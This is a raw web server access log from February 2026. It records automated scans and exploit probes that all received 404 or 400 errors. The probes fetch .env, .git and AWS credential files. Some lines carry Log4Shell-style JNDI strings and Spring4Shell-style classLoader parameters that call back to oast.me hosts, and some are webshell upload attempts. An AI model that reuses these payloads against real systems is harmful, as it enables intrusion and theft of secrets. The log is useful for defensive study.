185.241.208.170 - - [12/Feb/2026:13:34:04 +0000] "GET /.git/objects/ HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/10.1 Safari/603.1.30"
193.24.211.52 - - [12/Feb/2026:13:37:46 +0000] "GET /remote/login?lang=en HTTP/1.1" 404 1236 "-" "-"
193.24.211.52 - - [12/Feb/2026:13:37:48 +0000] "GET /remote/login?lang=en HTTP/1.1" 404 1236 "-" "-"
87.120.191.67 - - [12/Feb/2026:13:42:59 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
43.166.134.114 - - [12/Feb/2026:13:55:21 +0000] "GET / HTTP/1.1" 404 705 "http://150.230.34.123:443" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
79.124.40.174 - - [12/Feb/2026:14:10:51 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
3.130.168.2 - - [12/Feb/2026:14:40:19 +0000] "GET / HTTP/1.1" 404 705 "http://150.230.34.123:443/" "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.130.168.2 - - [12/Feb/2026:14:43:56 +0000] "GET / HTTP/1.1" 404 705 "-" "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
87.120.191.67 - - [12/Feb/2026:15:04:52 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
78.153.140.250 - - [12/Feb/2026:15:21:08 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.250 - - [12/Feb/2026:15:21:09 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
45.156.129.48 - - [12/Feb/2026:15:35:02 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
79.124.40.174 - - [12/Feb/2026:16:07:42 +0000] "GET /actuator/gateway/routes HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
20.29.24.90 - - [12/Feb/2026:16:15:11 +0000] "GET / HTTP/1.1" 404 705 "http://150.230.34.123:443/" "Mozilla/5.0 zgrab/0.x"
78.153.140.250 - - [12/Feb/2026:16:23:48 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.250 - - [12/Feb/2026:16:23:48 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
104.248.29.227 - - [12/Feb/2026:16:41:50 +0000] "GET /.git/config HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
195.170.172.128 - - [12/Feb/2026:16:42:36 +0000] "GET / HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [12/Feb/2026:16:42:39 +0000] "POST / HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [12/Feb/2026:16:42:41 +0000] "POST / HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [12/Feb/2026:16:42:43 +0000] "GET /WuEL HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)"
195.170.172.128 - - [12/Feb/2026:16:42:57 +0000] "GET /a HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [12/Feb/2026:16:43:00 +0000] "GET /download/file.ext HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [12/Feb/2026:16:43:02 +0000] "GET /SiteLoader HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [12/Feb/2026:16:43:04 +0000] "GET /mPlayer HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [12/Feb/2026:16:43:05 +0000] "POST / HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
195.170.172.128 - - [12/Feb/2026:16:43:07 +0000] "GET / HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36"
87.120.191.67 - - [12/Feb/2026:16:58:02 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.227.253.150 - - [12/Feb/2026:17:07:46 +0000] "GET /remote/login HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
45.227.253.150 - - [12/Feb/2026:17:07:47 +0000] "GET /login HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
185.12.59.118 - - [12/Feb/2026:18:06:34 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
185.242.226.121 - - [12/Feb/2026:18:07:22 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
20.169.104.211 - - [12/Feb/2026:18:10:45 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 zgrab/0.x"
20.168.0.218 - - [12/Feb/2026:18:11:59 +0000] "GET /owa/auth/logon.aspx HTTP/1.1" 404 705 "-" "Mozilla/5.0 zgrab/0.x"
185.242.226.121 - - [12/Feb/2026:18:15:48 +0000] "GET / HTTP/1.1" 404 705 "-" "Python/3.7 aiohttp/3.8.1"
78.153.140.250 - - [12/Feb/2026:18:38:34 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.250 - - [12/Feb/2026:18:38:35 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
87.120.191.67 - - [12/Feb/2026:18:50:41 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
172.86.72.200 - - [12/Feb/2026:19:36:25 +0000] "GET / HTTP/1.1" 404 1236 "-" "FileTransport PolycomVVX-VVX_400-UA/4.0.1.15031"
64.82.206.195 - - [12/Feb/2026:20:14:14 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
64.82.206.195 - - [12/Feb/2026:20:14:14 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
150.241.68.165 - - [12/Feb/2026:20:14:27 +0000] "GET /login HTTP/1.1" 404 705 "-" "Mozilla/5.0"
150.241.68.165 - - [12/Feb/2026:20:14:27 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0"
45.92.1.189 - - [12/Feb/2026:20:25:55 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.92.1.189 - - [12/Feb/2026:20:25:56 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
87.120.191.67 - - [12/Feb/2026:20:29:54 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
192.3.101.25 - - [12/Feb/2026:20:32:52 +0000] "GET /RDWeb/Pages/en-US/login.aspx HTTP/1.1" 404 1236 "-" "-"
192.3.101.25 - - [12/Feb/2026:20:32:54 +0000] "GET /RDWeb/Pages/en-US/login.aspx HTTP/1.1" 404 1236 "-" "-"
78.153.140.250 - - [12/Feb/2026:20:52:24 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.250 - - [12/Feb/2026:20:52:25 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
110.164.132.15 - - [12/Feb/2026:21:07:36 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
118.194.250.232 - - [12/Feb/2026:21:08:39 +0000] "GET / HTTP/1.1" 404 1236 "-" "curl/7.29.0"
152.32.129.154 - - [12/Feb/2026:21:09:28 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 9_1) AppleWebKit/588.51 (KHTML, like Gecko) Chrome/91.0.1583 Safari/537.36"
152.32.129.154 - - [12/Feb/2026:21:09:29 +0000] "GET /favicon.ico HTTP/1.1" 404 705 "-" "Go-http-client/1.1"
152.32.129.154 - - [12/Feb/2026:21:09:29 +0000] "GET /robots.txt HTTP/1.1" 404 705 "-" "Go-http-client/1.1"
152.32.129.154 - - [12/Feb/2026:21:09:29 +0000] "GET /sitemap.xml HTTP/1.1" 404 705 "-" "Go-http-client/1.1"
103.144.87.192 - - [12/Feb/2026:21:19:21 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 705 "150.230.34.123/user/register" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:109.0) Gecko/20100101 Firefox/115.0"
103.144.87.192 - - [12/Feb/2026:21:19:21 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
103.144.87.192 - - [12/Feb/2026:21:19:21 +0000] "POST /api/timelion/run HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
103.144.87.192 - - [12/Feb/2026:21:19:22 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 705 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.144.87.192 - - [12/Feb/2026:21:19:23 +0000] "POST /ztp/cgi-bin/handler HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.144.87.192 - - [12/Feb/2026:21:19:23 +0000] "POST /template/aui/text-inline.vm HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13) AppleWebKit/619.4 (KHTML, like Gecko) Version/16.1.13 Safari/619.4"
103.144.87.192 - - [12/Feb/2026:21:19:23 +0000] "POST /saml/login HTTP/1.1" 404 705 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.1"
103.144.87.192 - - [12/Feb/2026:21:19:24 +0000] "POST /goform/formWsc HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:139.0) Gecko/20100101 Firefox/139.0"
103.144.87.192 - - [12/Feb/2026:21:19:24 +0000] "POST /index.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0"
103.144.87.192 - - [12/Feb/2026:21:19:24 +0000] "POST /password_change.cgi HTTP/1.1" 404 705 "https://150.230.34.123" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
103.144.87.192 - - [12/Feb/2026:21:19:24 +0000] "POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0"
103.144.87.192 - - [12/Feb/2026:21:19:24 +0000] "POST /integration/saveGangster.action HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15"
103.144.87.192 - - [12/Feb/2026:21:19:30 +0000] "GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1" 404 1236 "${jndi:ldap://127.0.0.1#.${hostName}.referer.d65oqn97a5rsrk1jon503n64ot1eeg3ig.oast.me}" "${jndi:ldap://127.0.0.1#.${hostName}.useragent.d65oqn97a5rsrk1jon508ffwo8pardzmz.oast.me}"
110.164.132.15 - - [12/Feb/2026:21:26:10 +0000] "GET /login/login HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
110.164.132.15 - - [12/Feb/2026:21:26:16 +0000] "GET /login/pre_login_agreement HTTP/1.1" 404 705 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
172.202.117.221 - - [12/Feb/2026:21:32:51 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 404 705 "-" "Mozilla/5.0 zgrab/0.x"
43.159.149.216 - - [12/Feb/2026:21:42:38 +0000] "GET / HTTP/1.1" 404 705 "http://150.230.34.123:443" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
87.120.191.67 - - [12/Feb/2026:22:06:47 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
81.29.142.6 - - [12/Feb/2026:22:53:52 +0000] "GET / HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36"
81.29.142.6 - - [12/Feb/2026:22:53:53 +0000] "GET /favicon.ico HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36"
78.153.140.250 - - [12/Feb/2026:23:01:58 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.250 - - [12/Feb/2026:23:01:59 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
193.174.89.19 - - [12/Feb/2026:23:05:40 +0000] "GET / HTTP/1.1" 404 1236 "-" "zgrab2-dicomweb/1.0"
185.241.208.170 - - [12/Feb/2026:23:05:49 +0000] "GET /.git/objects/pack/ HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
147.185.133.108 - - [12/Feb/2026:23:14:31 +0000] "GET / HTTP/1.1" 404 705 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
45.135.193.11 - - [12/Feb/2026:23:15:46 +0000] "GET / HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:23:15:46 +0000] "GET /.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:23:15:47 +0000] "GET /.env.local HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:23:15:47 +0000] "GET /.env.staging HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:23:15:47 +0000] "GET /.env.production HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:23:15:47 +0000] "GET /.env.development HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:23:15:47 +0000] "GET /.aws/credentials HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:23:15:47 +0000] "GET /app/.env HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
45.135.193.11 - - [12/Feb/2026:23:15:47 +0000] "GET /config.json HTTP/1.1" 404 1236 "-" "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xe2\x80\x94 submit exclusion requests at the linked URL)"
34.207.164.227 - - [12/Feb/2026:23:16:19 +0000] "GET /favicon.ico HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
89.42.231.200 - - [12/Feb/2026:23:17:27 +0000] "GET /SDK/webLanguage HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
54.161.45.186 - - [12/Feb/2026:23:18:18 +0000] "GET /robots.txt HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
184.72.172.155 - - [12/Feb/2026:23:18:24 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
87.120.191.67 - - [12/Feb/2026:23:27:31 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.156.129.130 - - [12/Feb/2026:23:39:00 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
23.29.156.136 - - [12/Feb/2026:23:52:50 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
23.29.156.136 - - [12/Feb/2026:23:52:50 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
103.144.87.192 - - [13/Feb/2026:00:04:06 +0000] "GET /?class.module.classLoader.resources.context.configFile=https://d65oqn97a5rsrk1jon501dc6qs4wpconc.oast.me&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
103.144.87.192 - - [13/Feb/2026:00:04:07 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 400 679 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15"
103.144.87.192 - - [13/Feb/2026:00:04:07 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.144.87.192 - - [13/Feb/2026:00:04:07 +0000] "GET /cgi-bin/stats HTTP/1.1" 400 679 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
103.144.87.192 - - [13/Feb/2026:00:04:07 +0000] "GET /cgi-bin/status/status.cgi HTTP/1.1" 400 679 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.16"
103.144.87.192 - - [13/Feb/2026:00:04:07 +0000] "GET /cgi-bin/status HTTP/1.1" 400 679 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.16"
103.144.87.192 - - [13/Feb/2026:00:04:07 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
103.144.87.192 - - [13/Feb/2026:00:04:07 +0000] "GET /?class.module.classLoader.resources.context.configFile=http://d65oqn97a5rsrk1jon50hpz995ozzscik.oast.me&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.8"
103.144.87.192 - - [13/Feb/2026:00:04:07 +0000] "GET /debug.cgi HTTP/1.1" 400 679 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
103.144.87.192 - - [13/Feb/2026:00:04:07 +0000] "GET / HTTP/1.1" 400 679 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.144.87.192 - - [13/Feb/2026:00:04:07 +0000] "GET /cgi-bin/test HTTP/1.1" 400 679 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
103.144.87.192 - - [13/Feb/2026:00:04:07 +0000] "GET /test.cgi HTTP/1.1" 400 679 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.4 Safari/605.1.15"
103.144.87.192 - - [13/Feb/2026:00:04:07 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 400 679 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
78.153.140.250 - - [13/Feb/2026:00:15:47 +0000] "GET /.env HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.250 - - [13/Feb/2026:00:15:48 +0000] "POST / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
46.173.209.136 - - [13/Feb/2026:01:08:06 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
45.156.128.130 - - [13/Feb/2026:01:18:53 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
195.178.110.159 - - [13/Feb/2026:01:26:08 +0000] "GET /.git/config HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0"
109.105.210.102 - - [13/Feb/2026:01:27:53 +0000] "GET / HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "GET /jQuery-File-Upload/server/php/index.php/files/9SzwGLX5.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "GET /server/php/upload.class.php/files/9SzwGLX5.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "POST /server/php/upload.class.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0"
103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "GET /files/9SzwGLX5.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/117.0 Safari/537.36"
103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "GET /files/9SzwGLX5.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.8"
103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "GET /jquery-file-upload/server/php/index.php/files/9SzwGLX5.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0"
103.144.87.192 - - [13/Feb/2026:01:41:31 +0000] "POST /server/php/UploadHandler.php HTTP/1.1" 404 705 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
